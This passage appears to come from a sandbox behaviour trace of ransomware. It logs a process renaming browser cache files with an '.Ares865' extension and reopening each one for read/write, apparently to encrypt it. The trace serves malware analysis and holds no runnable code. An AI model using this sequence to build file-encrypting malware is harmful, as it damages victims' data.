Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfBq0[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbefbq0[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.550] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6565) returned 1 [0095.553] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfBrz[1].jpg.Ares865") returned 117 [0095.554] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfBrz[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbefbrz[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfBrz[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbefbrz[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.555] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfBrz[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbefbrz[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.555] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=9753) returned 1 [0095.558] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfXl6[1].jpg.Ares865") returned 117 [0095.558] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfXl6[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbefxl6[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfXl6[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbefxl6[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.559] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfXl6[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbefxl6[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.559] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8068) returned 1 [0095.562] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEgEH3[1].jpg.Ares865") returned 117 [0095.562] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEgEH3[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbegeh3[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEgEH3[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbegeh3[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.564] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEgEH3[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbegeh3[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.564] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7294) returned 1 [0095.567] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEgsz3[1].jpg.Ares865") returned 117 [0095.567] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEgsz3[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbegsz3[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEgsz3[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbegsz3[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.568] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEgsz3[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbegsz3[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.568] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2297) returned 1 [0095.572] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEgTxB[1].jpg.Ares865") returned 117 [0095.572] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEgTxB[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbegtxb[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEgTxB[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbegtxb[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.573] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEgTxB[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbegtxb[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.573] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2487) returned 1 [0095.576] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBo1lFJ[2].png.Ares865") returned 117 [0095.576] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBo1lFJ[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbo1lfj[2].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBo1lFJ[2].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbo1lfj[2].png.ares865"), dwFlags=0x1) returned 1 [0095.577] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBo1lFJ[2].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbo1lfj[2].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.578] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=878) returned 1 [0095.580] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBs47TE[1].png.Ares865") returned 117 [0095.580] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBs47TE[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbs47te[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBs47TE[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbs47te[1].png.ares865"), dwFlags=0x1) returned 1 [0095.581] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBs47TE[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbs47te[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.582] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=575) returned 1 [0095.584] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBu9sWQ[1].jpg.Ares865") returned 117 [0095.584] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBu9sWQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbu9swq[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBu9sWQ[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbu9swq[1].jpg.ares865"), dwFlags=0x1) returned 1 [0095.585] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBu9sWQ[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbu9swq[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.585] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11440) returned 1 [0095.589] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BByazif[2].jpg.Ares865") returned 117 [0095.589] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BByazif[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbyazif[2].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BByazif[2].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbyazif[2].jpg.ares865"), dwFlags=0x1) returned 1 [0095.590] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BByazif[2].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbyazif[2].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.590] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8844) returned 1 [0095.596] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\bs-components[1].css.Ares865") returned 123 [0095.596] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\bs-components[1].css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bs-components[1].css"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\bs-components[1].css.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bs-components[1].css.ares865"), dwFlags=0x1) returned 1 [0095.597] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\bs-components[1].css.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bs-components[1].css.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.598] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=44819) returned 1 [0095.603] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\bs-util[1].css.Ares865") returned 117 [0095.603] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\bs-util[1].css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bs-util[1].css"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\bs-util[1].css.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bs-util[1].css.ares865"), dwFlags=0x1) returned 1 [0095.604] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\bs-util[1].css.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bs-util[1].css.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.604] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=12478) returned 1 [0095.623] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\c7-bdbd0d-91cdfbc1[1].txt.Ares865") returned 128 [0095.623] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\c7-bdbd0d-91cdfbc1[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\c7-bdbd0d-91cdfbc1[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\c7-bdbd0d-91cdfbc1[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\c7-bdbd0d-91cdfbc1[1].txt.ares865"), dwFlags=0x1) returned 1 [0095.627] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\c7-bdbd0d-91cdfbc1[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\c7-bdbd0d-91cdfbc1[1].txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.628] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=152817) returned 1 [0095.640] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\cb=gapi[1].loaded_0.Ares865") returned 122 [0095.640] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\cb=gapi[1].loaded_0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\cb=gapi[1].loaded_0"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\cb=gapi[1].loaded_0.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\cb=gapi[1].loaded_0.ares865"), dwFlags=0x1) returned 1 [0095.642] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\cb=gapi[1].loaded_0.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\cb=gapi[1].loaded_0.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.643] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=135645) returned 1 [0095.654] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\cb=gapi[2].loaded_0.Ares865") returned 122 [0095.654] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\cb=gapi[2].loaded_0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\cb=gapi[2].loaded_0"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\cb=gapi[2].loaded_0.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\cb=gapi[2].loaded_0.ares865"), dwFlags=0x1) returned 1 [0095.655] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\cb=gapi[2].loaded_0.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\cb=gapi[2].loaded_0.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.656] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=25918) returned 1 [0095.659] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\chrome.min[1].css.Ares865") returned 120 [0095.659] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\chrome.min[1].css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\chrome.min[1].css"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\chrome.min[1].css.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\chrome.min[1].css.ares865"), dwFlags=0x1) returned 1 [0095.661] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\chrome.min[1].css.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\chrome.min[1].css.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.661] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=172095) returned 1 [0095.681] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\chrome_throbber_fast_16[1].gif.Ares865") returned 133 [0095.681] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\chrome_throbber_fast_16[1].gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\chrome_throbber_fast_16[1].gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\chrome_throbber_fast_16[1].gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\chrome_throbber_fast_16[1].gif.ares865"), dwFlags=0x1) returned 1 [0095.683] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\chrome_throbber_fast_16[1].gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\chrome_throbber_fast_16[1].gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.683] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1548) returned 1 [0095.686] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\collect[1].gif.Ares865") returned 117 [0095.686] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\collect[1].gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\collect[1].gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\collect[1].gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\collect[1].gif.ares865"), dwFlags=0x1) returned 1 [0095.688] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\collect[1].gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\ikqeepzr\\collect[1].gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0095.688] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=43) returned 1 [0095.691] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\ContainerTag[1].js.Ares865") returned 121 [0095.691] MoveFileExW 